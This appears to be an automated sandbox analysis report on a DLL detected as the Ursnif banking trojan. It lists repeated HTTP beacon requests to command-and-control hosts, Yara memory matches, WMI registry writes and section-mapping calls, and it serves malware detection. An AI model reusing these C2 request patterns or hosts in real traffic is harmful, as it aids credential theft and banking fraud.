            Source: global trafficHTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87/xXKn3PzxfNPne/1IWtDw4e/zao8w3_2FqS1tUowEpdILrG/AQc_2F2CTQ/Kg84n698KmhLQ87R8/T3KY8S12PpxD/H69sMspGVxv/is2jKybUtpc7W2/tjpg5c_2BM2CHgmR9sa3h/opwZ5u985b9SYlvV/9nvFId2LU1FOjTP/3gzCgoFC/zqOGqAVh/K.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: intermedia.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/8GCWuTw3vFr_2BaLQHxEj/S2mZ_2Bs1ztZVt4J/tWEHNc4XanBwmnu/I2msIqz_2B6GZdxr2f/MEql68nFt/nYxdw4RZXpFaqbijhmkw/0I3UhZ9PcRsKOEspkq8/7YzXu2AOi0fYDlLet1LtxN/Z8j42Kwsx6Kh3/NutAzqvZ/KcYW58Xr4T1MQTJAJB2YAhX/pcuj3_2Fx_/2BQrkwFa603_2B68s/I0dGq_2F0eCx/w74Pufb9K3x/hd2DOR_2F/4NgLz6GD.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: intermedia.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected Ursnif
            Source: Yara matchFile source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR
            Source: loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

            barindex
            Yara detected Ursnif
            Source: Yara matchFile source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,1_2_010C4872
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F94872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,5_2_04F94872
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04214872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,6_2_04214872
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04444872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,9_2_04444872

            System Summary

            barindex
            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: Wartless_v8.8.9.0.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_100022441_2_10002244
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C81DC1_2_010C81DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C6C621_2_010C6C62
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C4EF31_2_010C4EF3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F94EF35_2_04F94EF3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F96C625_2_04F96C62
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F981DC5_2_04F981DC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690DF95_2_03690DF9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690DF75_2_03690DF7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04216C626_2_04216C62
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04214EF36_2_04214EF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042181DC6_2_042181DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04446C629_2_04446C62
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04444EF39_2_04444EF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_044481DC9_2_044481DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_100012BE NtMapViewOfSection,1_2_100012BE
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10001F61 GetProcAddress,NtCreateSection,memset,1_2_10001F61
